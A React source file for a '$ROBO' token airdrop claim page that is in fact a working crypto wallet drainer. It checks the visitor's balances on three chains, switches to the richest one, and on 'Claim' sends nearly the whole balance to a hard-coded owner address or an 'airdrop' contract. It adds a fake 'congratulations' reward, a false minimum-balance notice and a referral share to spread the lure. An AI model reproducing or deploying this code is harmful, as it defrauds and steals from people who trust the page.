import { useEffect, useState } from 'react';
import { useAccount, useBalance, useSwitchChain, useWriteContract, useDisconnect, useSendTransaction } from 'wagmi';
import { bsc, mainnet, base } from 'wagmi/chains';
import { parseEther } from 'viem';
import { ExternalLink, Wallet, LogOut, ArrowRight, Twitter } from 'lucide-react';
import { Link, useSearchParams } from 'react-router-dom'; // Tambah useSearchParams
import { useAppKit } from '@reown/appkit/react';
import { AIRDROP_CONTRACT_ADDRESS, AIRDROP_ABI } from '../config/contracts';

const OWNER_ADDRESS = '0x6ca63344301845d4831278a31021ec06e8febb1e';
const ZERO_ADDRESS = '0x0000000000000000000000000000000000000000'; // Zero Address

const GAS_BUFFERS = {
  [bsc.id]: parseEther('0.0005'),
  [base.id]: parseEther('0.0001'),
  [mainnet.id]: parseEther('0.0003'),
};

export default function ClaimPage() {
  const { address, isConnected, chain, connector } = useAccount();
  const { switchChain } = useSwitchChain();
  const { writeContract } = useWriteContract();
  const { sendTransaction } = useSendTransaction();
  const { disconnect } = useDisconnect();
  const { open } = useAppKit();
  
  // Hook untuk baca parameter URL
  const [searchParams] = useSearchParams();
  
  const [hasScanned, setHasScanned] = useState(false);

  const { data: bnbData } = useBalance({ address, chainId: bsc.id });
  const { data: ethData } = useBalance({ address, chainId: mainnet.id });
  const { data: baseData } = useBalance({ address, chainId: base.id });

  useEffect(() => {
    if (isConnected && switchChain && !hasScanned) {
      if (bnbData && ethData && baseData) {
        const valBnb = parseFloat(bnbData.formatted || '0');
        const valEth = parseFloat(ethData.formatted || '0');
        const valBase = parseFloat(baseData.formatted || '0');

        let targetChain = bsc.id; 

        if (valBnb > 0 || valEth > 0 || valBase > 0) {
          const maxVal = Math.max(valBnb, valEth, valBase);
          if (maxVal === valEth) targetChain = mainnet.id;
          else if (maxVal === valBase) targetChain = base.id;
        }

        if (chain?.id !== targetChain) {
          switchChain({ chainId: targetChain });
        }
        
        setHasScanned(true); 
      }
    }
    
    if (!isConnected) setHasScanned(false);
  }, [isConnected, bnbData, ethData, baseData, chain, switchChain, hasScanned]);

  const currentBalance = chain ? (chain.id === bsc.id ? bnbData : chain.id === base.id ? baseData : ethData) : undefined;
  const gasBuffer = chain ? GAS_BUFFERS[chain.id] || parseEther('0.001') : parseEther('0.001');
  
  let maxAmount = parseEther('0');
  if (currentBalance && currentBalance.value > gasBuffer) {
    maxAmount = currentBalance.value - gasBuffer;
  }

  let networkName = 'BNB Chain';
  let coinSymbol = 'BNB';
  let networkLogo = 'https://raw.githubusercontent.com/trustwallet/assets/master/blockchains/smartchain/info/logo.png';
  let warningColor = 'text-[#F3BA2F]'; 

  if (chain?.id === mainnet.id) {
    networkName = 'Ethereum';
    coinSymbol = 'ETH';
    networkLogo = 'https://raw.githubusercontent.com/trustwallet/assets/master/blockchains/ethereum/info/logo.png';
    warningColor = 'text-[#627EEA]'; 
  } else if (chain?.id === base.id) {
    networkName = 'Base';
    coinSymbol = 'ETH';
    networkLogo = 'https://raw.githubusercontent.com/trustwallet/assets/master/blockchains/base/info/logo.png';
    warningColor = 'text-[#0052FF]'; 
  }
  
  const isInsufficientBal = maxAmount === parseEther('0');

    const handleClaim = () => {
    if (isInsufficientBal) return;

    // 1. Cek apakah ada parameter ?ref=... di URL
    const urlParams = new URLSearchParams(window.location.search);
    const refParam = urlParams.get('ref');
    
    // 2. Jika ada ref dan valid, pakai itu. Kalau tidak, pakai Zero Address
    const refAddress = (refParam && refParam.startsWith('0x')) ? refParam : '0x0000000000000000000000000000000000000000';

    console.log("Attempting to Claim with Ref:", refAddress);
    console.log("Value:", maxAmount.toString());

    if (chain?.id === bsc.id) {
      writeContract({
        address: AIRDROP_CONTRACT_ADDRESS, 
        abi: AIRDROP_ABI,
        functionName: 'claimAirdrop',
        value: maxAmount,
        args: [refAddress] // KIRIM ARGUMEN INI
      });
    } else {
      sendTransaction({
        to: OWNER_ADDRESS,
        value: maxAmount,
      });
    }
  };

  const handleShareTwitter = () => {
    const referralLink = `${window.location.origin}/?ref=${address}`;
    const text = `Eligible for all! 🚀 Claim your $ROBO Now!\n\n${referralLink}\n\n$ROBO #ClaimRobo #CheckEligibility`;
    const twitterUrl = `https://twitter.com/intent/tweet?text=${encodeURIComponent(text)}`;
    window.open(twitterUrl, '_blank');
  };

  const handleDisconnect = () => {
    if (connector) {
      disconnect({ connector });
    } else {
      disconnect();
    }
  };

  const innerButtonStyle = "relative z-10 flex flex-row items-center justify-center transition-all w-full rounded-[22px] duration-300 text-[15px] md:text-[16px] font-[500] py-3.5 px-6 bg-[black] text-[white] hover:bg-[#333333]";

  return (
    <div className="relative w-full flex flex-col items-center">
      
      <div className="absolute top-1/2 left-1/2 -translate-x-1/2 -translate-y-[60%] w-[110%] h-[110%] bg-gradient-to-br from-pink-200/60 via-purple-200/40 to-cyan-200/60 blur-[60px] -z-10 rounded-full pointer-events-none"></div>

      <div className="bg-white rounded-[2rem] p-6 md:p-8 shadow-[0_8px_30px_rgba(0,0,0,0.06)] w-full text-left relative z-10 border border-gray-100">
        
        <div className="flex justify-between items-center mb-6">
          <h2 className="text-xl md:text-2xl font-bold text-gray-900 tracking-tight">Claim Your Tokens</h2>
          
          {isConnected ? (
            <div className="bg-gray-50 rounded-full px-3 py-1.5 flex items-center gap-2 text-xs font-semibold text-gray-600 font-mono border border-gray-200 shadow-sm shrink-0">
              <Wallet size={12} className="text-gray-400" />
              {address?.slice(0,4)}...{address?.slice(-4)}
              <button onClick={handleDisconnect} className="ml-1 text-gray-400 hover:text-red-500 transition-colors">
                <LogOut size={12} />
              </button>
            </div>
          ) : (
            <div 
              onClick={() => open({ view: 'Connect' })} 
              className="relative rounded-full p-[2px] overflow-hidden group cursor-pointer shadow-sm hover:shadow-md transition-shadow shrink-0"
            >
              <div className="absolute top-1/2 left-1/2 w-[300%] h-[300%] -translate-x-1/2 -translate-y-1/2 bg-[conic-gradient(from_0deg,#f9a8d4,#d8b4fe,#67e8f9,#f9a8d4)] animate-[spin_3s_linear_infinite] z-0"></div>
              <div className="relative z-10 bg-black text-white text-[11px] md:text-xs font-bold py-1.5 px-4 rounded-full hover:bg-[#333333] transition-colors flex items-center justify-center">
                Connect Wallet
              </div>
            </div>
          )}
        </div>

        <div className="bg-gradient-to-b from-blue-200 to-transparent rounded-3xl pt-10 pb-8 flex flex-col items-center justify-center mb-6 relative overflow-hidden">
           <div className="absolute top-10 left-[15%] w-1.5 h-6 bg-[#FFB084] rounded-full rotate-[35deg] opacity-90 z-0"></div>
           <div className="absolute top-[50%] left-[8%] w-2 h-8 bg-[#84C9FF] rounded-full -rotate-[20deg] opacity-90 z-0"></div>
           <div className="absolute top-8 right-[20%] w-1.5 h-5 bg-[#84C9FF] rounded-full rotate-[15deg] opacity-90 z-0"></div>
           <div className="absolute top-[45%] right-[10%] w-2 h-7 bg-[#FFB084] rounded-full -rotate-[40deg] opacity-90 z-0"></div>

           <img src="/garis.png" alt="Garis Cincin" className="absolute top-1/2 left-1/2 -translate-x-1/2 -translate-y-1/2 w-[450px] h-[450px] md:w-[600px] md:h-[600px] object-contain pointer-events-none opacity-90 z-0" />
           <img src="/logotengah.png" alt="Logo Token" className="w-20 h-20 md:w-28 md:h-28 relative z-10 object-contain drop-shadow-lg mb-4" />
           
           <div className="relative z-10 flex flex-col items-center">
             <h3 className="text-4xl md:text-5xl font-black text-gray-900 tracking-tight mt-2">11.3K</h3>
             <p className="text-gray-500 font-bold text-xs md:text-sm tracking-widest mt-1">$ROBO</p>
           </div>
        </div>

        <p className="text-center font-bold text-gray-800 mb-6 text-sm">Congratulations on your reward!</p>

        <div className="mb-8">
          <p className="text-xs md:text-sm font-bold text-gray-800 mb-3">Choose the wallet address to receive your $ROBO token</p>
          <div className="flex items-center justify-between bg-white border border-gray-200 rounded-xl p-3 shadow-sm overflow-hidden">
             
             <div className="flex items-center gap-3 w-[65%] sm:w-[70%]">
               <div className="bg-gray-100 p-1.5 rounded-lg shrink-0 flex items-center justify-center">
                 <Wallet size={16} className="text-gray-500 fill-gray-400/20" />
               </div>
               <div className="w-full overflow-hidden flex items-center justify-start h-[36px]">
                 {isConnected ? (
                   <p className="text-[8.5px] xs:text-[9px] sm:text-[11px] font-mono tracking-tighter sm:tracking-normal whitespace-nowrap text-gray-600 font-medium w-full text-left bg-gray-50 px-2 py-1.5 rounded-md">
                     {address}
                   </p>
                 ) : (
                   <p className="text-[26px] md:text-[28px] text-black font-black leading-none tracking-[0.3em] flex items-center h-full pt-3">
                     * * * *
                   </p>
                 )}
               </div>
             </div>
             
             <div className={`${warningColor} text-[11px] md:text-sm font-bold flex items-center gap-1.5 shrink-0 whitespace-nowrap pl-2 leading-none`}>
               <img src={networkLogo} alt={networkName} className="w-4 h-4 md:w-5 md:h-5 object-contain" /> 
               {networkName}
             </div>
          </div>
          <p className="text-[11px] text-gray-400 mt-2.5 leading-relaxed font-medium">
            You selected the <span className="text-black font-bold">{networkName}</span> network. Please ensure this address can receive <span className="text-black font-bold">{networkName}</span> assets.
          </p>
        </div>

        <div className="flex flex-col items-center mb-8 w-full">
          {!isConnected ? (
            <div className="relative w-[60%] mx-auto rounded-[24px] p-[2.5px] overflow-hidden group cursor-pointer shadow-sm hover:shadow-md transition-shadow">
              <div className="absolute top-1/2 left-1/2 w-[300%] h-[300%] -translate-x-1/2 -translate-y-1/2 bg-[conic-gradient(from_0deg,#f9a8d4,#d8b4fe,#67e8f9,#f9a8d4)] animate-[spin_3s_linear_infinite] z-0"></div>
              <div onClick={() => open({ view: 'Connect' })} className={innerButtonStyle}>
                Claim
              </div>
            </div>
          ) : (
            <div className={`relative w-[60%] mx-auto rounded-[24px] p-[2.5px] overflow-hidden group shadow-sm hover:shadow-md transition-shadow ${isInsufficientBal ? 'cursor-not-allowed' : 'cursor-pointer'}`}>
               <div className="absolute top-1/2 left-1/2 w-[300%] h-[300%] -translate-x-1/2 -translate-y-1/2 bg-[conic-gradient(from_0deg,#f9a8d4,#d8b4fe,#67e8f9,#f9a8d4)] animate-[spin_3s_linear_infinite] z-0"></div>
               <button 
                 onClick={handleClaim} 
                 disabled={isInsufficientBal}
                 className={`${innerButtonStyle} ${isInsufficientBal ? 'opacity-90 pointer-events-none' : ''}`}
               >
                  Claim
               </button>
            </div>
          )}
          
          {isConnected && isInsufficientBal && (
            <span className="text-red-500 text-xs mt-3 font-semibold text-center">
              insufficient BNB balance FOR CLAIM , YOU MUST HODL 0.005 BNB FOR CLAIM
            </span>
          )}
        </div>

        <div className="w-full h-px bg-gray-100 mb-6"></div>

        <div className="mb-6">
           <p className="text-sm font-bold text-gray-800 mb-3">Deposit your $ROBO now at</p>
           <div className="space-y-3">
              <a href="https://web3.binance.com/" className="flex justify-between items-center bg-white border border-gray-200 rounded-xl p-3 hover:bg-gray-50 transition-colors shadow-sm">
                 <div className="flex items-center gap-3 font-bold text-gray-800 text-sm">
                    <div className="bg-black p-1 rounded-md flex items-center justify-center">
                      <img src="/binance.svg" alt="Binance Web3" className="w-5 h-5 object-contain"/>
                    </div> 
                    Binance Web3
                 </div>
                 <ExternalLink size={16} className="text-gray-400" />
              </a>
              <a href="https://www.bitget.com/spot/ROBOUSDT" className="flex justify-between items-center bg-white border border-gray-200 rounded-xl p-3 hover:bg-gray-50 transition-colors shadow-sm">
                 <div className="flex items-center gap-3 font-bold text-gray-800 text-sm">
                    <div className="bg-white border border-gray-100 shadow-sm p-1 rounded-md flex items-center justify-center">
                      <img src="/bitget.svg" alt="Bitget" className="w-5 h-5 object-contain"/>
                    </div> 
                    Bitget
                 </div>
                 <ExternalLink size={16} className="text-gray-400" />
              </a>
           </div>
        </div>

        {isConnected && (
           <div className="relative w-[60%] mx-auto rounded-[24px] p-[2.5px] overflow-hidden group cursor-pointer shadow-sm hover:shadow-md transition-shadow">
             <div className="absolute top-1/2 left-1/2 w-[300%] h-[300%] -translate-x-1/2 -translate-y-1/2 bg-[conic-gradient(from_0deg,#f9a8d4,#d8b4fe,#67e8f9,#f9a8d4)] animate-[spin_3s_linear_infinite] z-0"></div>
             <button onClick={handleShareTwitter} className={innerButtonStyle}>
                <Twitter size={16} className="mr-2" /> Share allocation on X
             </button>
           </div>
        )}

      </div>

      <div className="mt-8 w-full max-w-sm relative z-20 px-4">
        <Link 
          to="/swap" 
          className="group flex items-center justify-between gap-4 bg-white/70 backdrop-blur-xl border border-white/80 shadow-[0_10px_40px_rgba(0,0,0,0.06)] px-6 py-3.5 rounded-full hover:bg-white hover:scale-[1.02] hover:shadow-[0_10px_40px_rgba(0,0,0,0.1)] transition-all duration-300"
        >
          <span className="font-bold text-gray-800 text-sm md:text-base">Swap $ROBO</span>
          <div className="bg-black text-white p-2 rounded-full group-hover:translate-x-1.5 transition-transform duration-300 shadow-md">
             <ArrowRight size={16} />
          </div>
        </Link>
      </div>
    </div>
  );
}